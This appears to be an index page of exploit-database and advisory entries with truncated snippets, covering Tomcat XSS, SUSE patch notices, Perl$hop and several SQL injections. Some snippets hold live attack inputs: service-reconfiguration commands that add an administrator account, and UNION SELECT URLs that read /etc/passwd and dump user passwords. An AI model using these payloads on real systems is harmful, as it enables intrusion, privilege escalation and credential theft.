tomcat: XSS in Apache Tomcat calendar application
Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, relat...
Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /ad...
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation
No description provided by source. To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add net...
SUSE: Security Summary (SUSE-SR:2009:017)
The remote host is missing updates announced in advisory SUSE-SR:2009:017. SuSE Security Summaries are short on detail when it comes to the names of packages affected by a particular bug. Because of this, while this test will detect out of date packages, it cannot tell you what bugs impact which...
SLES9: Security update for XFree86-server
The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: XFree86-Xnest XFree86-Xvfb XFree86-server More details may also be found by searching for keyword 5012942 within the SuSE Enterprise Server 9 patch database...
SLES9: Security update for Apache2
The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: apache2-worker apache2-prefork apache2-example-pages apache2 apache2-devel apache2-doc libapr0 For more information, please visit the referenced security...
cour supreme 'index.php' SQL Injection & Local File Include Vulnerability
================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,loadfile'/etc/passwd',8+from+mysql.user...
Cour Supreme - SQL Injection
Cour Supreme - SQL Injection ================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select...
Rubrique SQL Injection
================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.info/rubrique.php?id=-1+union+select+1,2,uslogin,uspassword,5,6,7,8,9,10,11,12,13,14+from+ausersf...
Perl$hop E-Commerce Input Injection
A while back I was playing around with Perl$hop, which if you are not aware, is an e-commerce script developed by Waverider Systems. XSS Cross Site Scripting, Directory Traversal, Code Execution, and more! Wow, that sure is a lot of vulnerabilities for one product. It would seem as if the...
Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection
Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection A while back I was playing around with Perl$hop, which if you are not aware, is an e-commerce script developed by Waverider Systems. XSS Cross Site Scripting, Directory Traversal, Code Execution, and more! Wow, that sure is a l...
Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection
A while back I was playing around with Perl$hop, which if you are not aware, is an e-commerce script developed by Waverider Systems. XSS Cross Site Scripting, Directory Traversal, Code Execution, and more! Wow, that sure is a lot of vulnerabilities for one product. It would seem as if the...
openSUSE Security Update : apache2 (apache2-330)
This update fixes a problem in mod_proxy_http that was introduced by a previous security update. The descriptive text and package checks in this plugin were extracted from openSUSE Security Update apache2-330. The text description of this plugin i...
Ger Versluis 2000 SQL Injection
-------------------------------------------------------------------------- Ger Versluis 2000 version 5.5 24 SITE_fiche.php SQL Injection Vulnerability -------------------------------------------------------------------------- + Author : DeCo017 + Email : 5s5atlivedotfr + Vulnerability : SQL...
Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection
Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection -------------------------------------------------------------------------- Ger Versluis 2000 version 5.5 24 SITE_fiche.php SQL Injection Vulnerability -------------------------------------------------------------------------- + Author : DeCo01...
Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection
source: https://www.securityfocus.com/bid/43710/info Tausch Ticket Script is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit...
BBSGood. Speed Version 4.0 injection vulnerability-vulnerability warning-the black bar safety net
| Version: BBSGood.Speed Version 4.0 Vulnerability file: UserInfo.asp Vulnerability description: The variable Blogurl is passed unfiltered into an SQL statement, leading to an SQL injection vulnerability --- Code example: Lines 1729-1853. | case 14 if Request.QueryString"save"=1 then if trimRequest...
linux/x86 execve shellcode generator null byte free
Exploit for generator platform in category shellcode =================================================== linux/x86 execve shellcode generator null byte free =================================================== / \ Shellcode Generator null byte free. Author: certaindeath This program generates a...
Joomla Component com_pinboard Remote File Upload Vulnerability
Exploit for unknown platform in category web applications ============================================================== Joomla Component com_pinboard Remote File Upload Vulnerability ============================================================== | | Joomla Component com_pinboard Remote File Upload...